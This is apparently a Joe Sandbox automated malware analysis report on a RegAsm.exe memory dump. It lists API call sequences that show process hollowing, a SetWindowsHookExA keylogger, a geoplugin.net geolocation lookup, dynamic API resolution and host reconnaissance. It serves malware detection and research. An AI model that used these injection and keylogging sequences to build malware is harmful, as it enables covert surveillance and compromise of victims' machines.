In-memory module loading around 0x411d39: GetNativeSystemInfo, VirtualAlloc, VirtualFree, VirtualProtect, IsBadReadPtr, GetProcessHeap, HeapAlloc, HeapFree, SetLastError, ending at dllmain_dispatch nodes of a module based at 0x10000000. This is consistent with the "Maps a DLL or memory area into another process" and code-injection signatures listed in the overview, but the graph alone does not show the target process.
The remaining nodes are CRT start-up, exception, heap and locale code (IsProcessorFeaturePresent, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, TlsAlloc, GetStartupInfoW, InitializeCriticalSectionAndSpinCount, LoadLibraryExW, FreeLibrary, GetACP, GetOEMCP, IsValidCodePage, GetCPInfo, MultiByteToWideChar, WideCharToMultiByte, LCMapStringW, GetStringTypeW, RtlAllocateHeap, RtlReAllocateHeap, RtlInitializeSListHead, GetSystemTimeAsFileTime, GetCurrentThreadId, GetCurrentProcessId, QueryPerformanceCounter) and carries no sample-specific behaviour.]
56266 10003505 56267 10003510 56266->56267 56282 10003972 RtlDeleteCriticalSection 56266->56282 56267->56247 56301 10007457 56269->56301 56272 10003529 7 API calls 3 library calls 56272->56248 56273->56263 56283 10003af1 56274->56283 56278 1000390b 56279 10003918 56278->56279 56289 1000391b 5 API calls ___vcrt_FlsFree 56278->56289 56279->56266 56281 100038fd 56281->56266 56282->56264 56290 10003a82 56283->56290 56285 10003b0b 56286 10003b24 TlsAlloc 56285->56286 56287 100038f2 56285->56287 56287->56281 56288 10003ba2 5 API calls try_get_function 56287->56288 56288->56278 56289->56281 56291 10003aaa 56290->56291 56293 10003aa6 __crt_fast_encode_pointer 56290->56293 56291->56293 56294 100039be 56291->56294 56293->56285 56296 100039cd try_get_first_available_module 56294->56296 56295 100039ea LoadLibraryExW 56295->56296 56297 10003a05 GetLastError 56295->56297 56296->56295 56298 10003a60 FreeLibrary 56296->56298 56299 10003a77 56296->56299 56300 10003a38 LoadLibraryExW 56296->56300 56297->56296 56298->56296 56299->56293 56300->56296 56304 10007470 56301->56304 56302 10002ada _ValidateLocalCookies 5 API calls 56303 100024a3 56302->56303 56303->56251 56303->56272 56304->56302 56305 10005bff 56313 10005d5c 56305->56313 56307 10005c13 56310 10005c1b 56311 10005c28 56310->56311 56321 10005c2b 10 API calls 56310->56321 56314 10005c45 _abort 4 API calls 56313->56314 56315 10005d83 56314->56315 56316 10005d9b TlsAlloc 56315->56316 56317 10005d8c 56315->56317 56316->56317 56318 10002ada _ValidateLocalCookies 5 API calls 56317->56318 56319 10005c09 56318->56319 56319->56307 56320 10005b7a 19 API calls 2 library calls 56319->56320 56320->56310 56321->56307

Control-flow Graph

APIs
• LoadLibraryA.KERNEL32(Psapi), ref: 0041CBF6
• GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CBFF
• GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CC16
• GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC19
• LoadLibraryA.KERNEL32(shcore), ref: 0041CC2B
• GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC2E
• LoadLibraryA.KERNEL32(user32), ref: 0041CC3F
• GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC42
• LoadLibraryA.KERNEL32(ntdll), ref: 0041CC54
• GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC57
• LoadLibraryA.KERNEL32(kernel32), ref: 0041CC63
• GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC66
• GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040EA1C), ref: 0041CC77
• GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC7A
• GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040EA1C), ref: 0041CC8B
• GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC8E
• LoadLibraryA.KERNEL32(Shell32), ref: 0041CC9F
• GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCA2
• GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040EA1C), ref: 0041CCB3
• GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCB6
• GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040EA1C), ref: 0041CCC7
• GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCCA
• GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040EA1C), ref: 0041CCDB
• GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCDE
• GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040EA1C), ref: 0041CCEF
• GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCF2
• GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040EA1C), ref: 0041CD03
• GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD06
• LoadLibraryA.KERNEL32(Shlwapi), ref: 0041CD14
• GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD17
• LoadLibraryA.KERNEL32(kernel32), ref: 0041CD28
• GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD2B
• GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040EA1C), ref: 0041CD38
• GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD3B
• GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040EA1C), ref: 0041CD48
• GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD4B
• LoadLibraryA.KERNEL32(Iphlpapi), ref: 0041CD5D
• GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD60
• LoadLibraryA.KERNEL32(Iphlpapi), ref: 0041CD6D
• GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD70
• GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040EA1C), ref: 0041CD81
• GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD84
• GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040EA1C), ref: 0041CD95
• GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD98
• LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CDAA
• GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CDAD
• LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CDBA
• GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CDBD
• LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CDCA
• GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CDCD
• LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CDDA
• GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CDDD
Strings
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: AddressProc$LibraryLoad$HandleModule
• String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
• API String ID: 4236061018-3687161714
• Opcode ID: 6b21e851a0d3a51eeec0044f2aae63c374cf6436741b915ef551e22e35f3a136
• Instruction ID: 87b5fa294a9840a4da0a94e675c49188b16ea4214af7843bc20054d8537ab592
• Opcode Fuzzy Hash: 6b21e851a0d3a51eeec0044f2aae63c374cf6436741b915ef551e22e35f3a136
• Instruction Fuzzy Hash: 06419AA0E8035879DA107BB65D8DE3B3E5CD9857953614837B05C93550FBBCDC408EAE

Control-flow Graph

APIs
• GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418171
• GetProcAddress.KERNEL32(00000000), ref: 00418174
• GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00418185
• GetProcAddress.KERNEL32(00000000), ref: 00418188
• GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 00418199
• GetProcAddress.KERNEL32(00000000), ref: 0041819C
• GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004181AD
• GetProcAddress.KERNEL32(00000000), ref: 004181B0
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418252
• VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041826A
• GetThreadContext.KERNEL32(?,00000000), ref: 00418280
• ReadProcessMemory.KERNEL32 ref: 004182A6
• NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 004182CE
• NtUnmapViewOfSection.NTDLL(?,?), ref: 004182F6
• NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 00418316
• VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00418328
• NtClose.NTDLL(?), ref: 00418332
• TerminateProcess.KERNEL32(?,00000000), ref: 0041833C
• GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041837C
• NtMapViewOfSection.NTDLL(?,00000000), ref: 00418387
• WriteProcessMemory.KERNEL32 ref: 00418446
• SetThreadContext.KERNEL32(?,00000000), ref: 00418463
• ResumeThread.KERNEL32(?), ref: 00418470
• VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00418487
• GetCurrentProcess.KERNEL32(?), ref: 00418492
• NtUnmapViewOfSection.NTDLL(00000000), ref: 00418499
• NtClose.NTDLL(?), ref: 004184A3
• TerminateProcess.KERNEL32(?,00000000), ref: 004184AD
• GetLastError.KERNEL32 ref: 004184B5
Strings
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: Process$Section$AddressHandleModuleProcView$ThreadVirtual$CloseContextCreateCurrentFreeMemoryTerminateUnmap$AllocErrorLastReadResumeWrite
• String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
• API String ID: 316982871-3035715614
• Opcode ID: c823a5a523639eb235f5adfe7c5fce7303d6972b4bd708db87ed0c766a231877
• Instruction ID: d7ba82c79e3f17b97bd8f2c1aaed993f07984c16d96ff77cb9dc1491e823fc6f
• Opcode Fuzzy Hash: c823a5a523639eb235f5adfe7c5fce7303d6972b4bd708db87ed0c766a231877
• Instruction Fuzzy Hash: 69A15FB0604305AFDB209F64DD85B6B7BE8FF48705F00482EF685D6291EB78D844CB59

Control-flow Graph

APIs
• GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A30E
• SetWindowsHookExA.USER32(0000000D,0040A2DF,00000000), ref: 0040A31C
• GetLastError.KERNEL32 ref: 0040A328
  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
• GetMessageA.USER32 ref: 0040A376
• TranslateMessage.USER32(?), ref: 0040A385
• DispatchMessageA.USER32(?), ref: 0040A390
Strings
• Keylogger initialization failure: error , xrefs: 0040A33C
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                                                                                                  • String ID: Keylogger initialization failure: error
                                                                                                                                  • API String ID: 3219506041-952744263
                                                                                                                                  • Opcode ID: 142d2ef2dd7a7f37dd8d92b010d75905bf9ead93cb94639157b9e4adcc72f5f3
                                                                                                                                  • Instruction ID: 8743f2250fb8cae6a99ae5fb3d4b34fe2baf279f6720e4878f05ffc9670b3ffc
                                                                                                                                  • Opcode Fuzzy Hash: 142d2ef2dd7a7f37dd8d92b010d75905bf9ead93cb94639157b9e4adcc72f5f3
                                                                                                                                  • Instruction Fuzzy Hash: 6011BF31510301EBC710BB769D0986B77ACEA95715B20097EFC82E22D1EB34C910CBAA
                                                                                                                                  APIs
                                                                                                                                  • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                                                                                                                                  • lstrcatW.KERNEL32(?,?), ref: 10001151
                                                                                                                                  • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                                                                                                                                  • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                                                                                                                                  • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                                                                                                                                  • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                                                                                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 100011D0
                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 100011DB
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.920353796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.920348667.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.920353796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1083526818-0
                                                                                                                                  • Opcode ID: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                                                                                                                                  • Instruction ID: 89aa6ca17049c9a574106098fd68ded4b08ae6dd255c3979a52dcbc6bb9ed716
                                                                                                                                  • Opcode Fuzzy Hash: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                                                                                                                                  • Instruction Fuzzy Hash: D22193715043586BE714EB649C49FDF7BDCEF84394F00092AFA58D3190E770D64487A6
                                                                                                                                  APIs
                                                                                                                                  • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B438
                                                                                                                                  • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B44E
                                                                                                                                  • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B467
                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0041B4AD
                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0041B4B0
                                                                                                                                  Strings
                                                                                                                                  • http://geoplugin.net/json.gp, xrefs: 0041B448
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Internet$CloseHandleOpen$FileRead
                                                                                                                                  • String ID: http://geoplugin.net/json.gp
                                                                                                                                  • API String ID: 3121278467-91888290
                                                                                                                                  • Opcode ID: 70a4068dcfb2335a76a71926155551062e92c520b8980e27f9727ee13041a59e
                                                                                                                                  • Instruction ID: e320c318363c88f1c040182635621d8729538b68a2f0080144892bf513bd3cc2
                                                                                                                                  • Opcode Fuzzy Hash: 70a4068dcfb2335a76a71926155551062e92c520b8980e27f9727ee13041a59e
                                                                                                                                  • Instruction Fuzzy Hash: 011198311053126BD224AB269C49EBF7F9CEF86765F10043EF945A2282DB689C44C6FA
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 004117D7: SetLastError.KERNEL32(0000000D,00411D57,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 004117DD
                                                                                                                                  • SetLastError.KERNEL32(000000C1,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 00411D72
                                                                                                                                  • GetNativeSystemInfo.KERNEL32(?), ref: 00411DE0
                                                                                                                                  • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?), ref: 00411E04
                                                                                                                                    • Part of subcall function 00411CDE: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411E22,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CEE
                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?), ref: 00411E4B
                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 00411E52
                                                                                                                                  • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411F65
                                                                                                                                    • Part of subcall function 004120B2: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F72,?,?,?,?,?), ref: 00412122
                                                                                                                                    • Part of subcall function 004120B2: HeapFree.KERNEL32(00000000), ref: 00412129
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3950776272-0
                                                                                                                                  • Opcode ID: 718d42136e622159178195cb0efe2cc12f9c08079781f225a480952b3bcd75f7
                                                                                                                                  • Instruction ID: da58ab861bd0a84ec3871346ef31e8b8814b9d9500880b3a3e1890ad13292c25
                                                                                                                                  • Opcode Fuzzy Hash: 718d42136e622159178195cb0efe2cc12f9c08079781f225a480952b3bcd75f7
                                                                                                                                  • Instruction Fuzzy Hash: F761A270700611ABCB209F66C981BAA7BA5AF44704F14411AFF05877A2D77CE8C2CBD9
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00413584: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004135A4
                                                                                                                                    • Part of subcall function 00413584: RegQueryValueExA.KERNEL32 ref: 004135C2
                                                                                                                                    • Part of subcall function 00413584: RegCloseKey.KERNEL32(?), ref: 004135CD
                                                                                                                                  • Sleep.KERNEL32(00000BB8), ref: 0040F896
                                                                                                                                  • ExitProcess.KERNEL32 ref: 0040F905
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseExitOpenProcessQuerySleepValue
                                                                                                                                  • String ID: 5.1.3 Pro$override$pth_unenc
                                                                                                                                  • API String ID: 2281282204-1392497409
                                                                                                                                  • Opcode ID: 12348d3a2fbe885265e601d0d8f624f68943fb23a48e4508fc59bb7df0f8f03e
                                                                                                                                  • Instruction ID: d275b5d15c9ff05a0ec0da3c9587874d7690dc7fa5d0ec02d6e8a4ede61593ab
                                                                                                                                  • Opcode Fuzzy Hash: 12348d3a2fbe885265e601d0d8f624f68943fb23a48e4508fc59bb7df0f8f03e
                                                                                                                                  • Instruction Fuzzy Hash: 5921E171B0420127D6087676885B6AE399A9B80708F50453FF409672D7FF7C8E0483AF
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: SystemTimes$Sleep__aulldiv
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 188215759-0
                                                                                                                                  • Opcode ID: 32d4930cb2be9b30136c829dd369e4a23351f3455ccfda4be26c85d87a7cef4d
                                                                                                                                  • Instruction ID: 634937a4cd8d43e921f59083ecd148feda9109121ee8127270144c35be039893
                                                                                                                                  • Opcode Fuzzy Hash: 32d4930cb2be9b30136c829dd369e4a23351f3455ccfda4be26c85d87a7cef4d
                                                                                                                                  • Instruction Fuzzy Hash: D01133B35043456BC304EAB5CD85DEF779CEBC4358F040A3EF64982061EE29E94986A6
                                                                                                                                  APIs
                                                                                                                                  • GetComputerNameExW.KERNEL32(00000001,?,0000002B,8)3), ref: 0041B6BB
                                                                                                                                  • GetUserNameW.ADVAPI32(?,0040F25E), ref: 0041B6D3
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Name$ComputerUser
                                                                                                                                  • String ID: 8)3
                                                                                                                                  • API String ID: 4229901323-783258567
                                                                                                                                  • Opcode ID: 2a75debd1ac83804218ef8ff91a3dd31c7e5d47f43b5da7d436b4f8c80832694
                                                                                                                                  • Instruction ID: 8360233331794fbd8bccde093e114755ab2a7c2896376219b9d5f45c8fb32f7b
                                                                                                                                  • Opcode Fuzzy Hash: 2a75debd1ac83804218ef8ff91a3dd31c7e5d47f43b5da7d436b4f8c80832694
                                                                                                                                  • Instruction Fuzzy Hash: 90014F7190011CABCB01EBD1DC45EEDB7BCAF44309F10016AB505B21A1EFB46E88CBA8
                                                                                                                                  APIs
                                                                                                                                  • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,00433550,00000034,?,?,0033A208), ref: 004338DA
                                                                                                                                  • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,004335E3,00000000,?,00000000), ref: 004338F0
                                                                                                                                  • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,004335E3,00000000,?,00000000,0041E2E2), ref: 00433902
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Crypt$Context$AcquireRandomRelease
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1815803762-0
APIs
• SetUnhandledExceptionFilter.KERNEL32 ref: 00434BDD
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0

Control-flow Graph (function at 0040EA00)
APIs
  • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Psapi), ref: 0041CBF6
  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CBFF
  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CC16
  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC19
  • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(shcore), ref: 0041CC2B
  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC2E
  • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(user32), ref: 0041CC3F
  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC42
  • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(ntdll), ref: 0041CC54
  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC57
  • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(kernel32), ref: 0041CC63
  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC66
  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040EA1C), ref: 0041CC77
  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC7A
  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040EA1C), ref: 0041CC8B
  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC8E
  • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Shell32), ref: 0041CC9F
  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCA2
  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040EA1C), ref: 0041CCB3
  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCB6
  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040EA1C), ref: 0041CCC7
  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCCA
  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040EA1C), ref: 0041CCDB
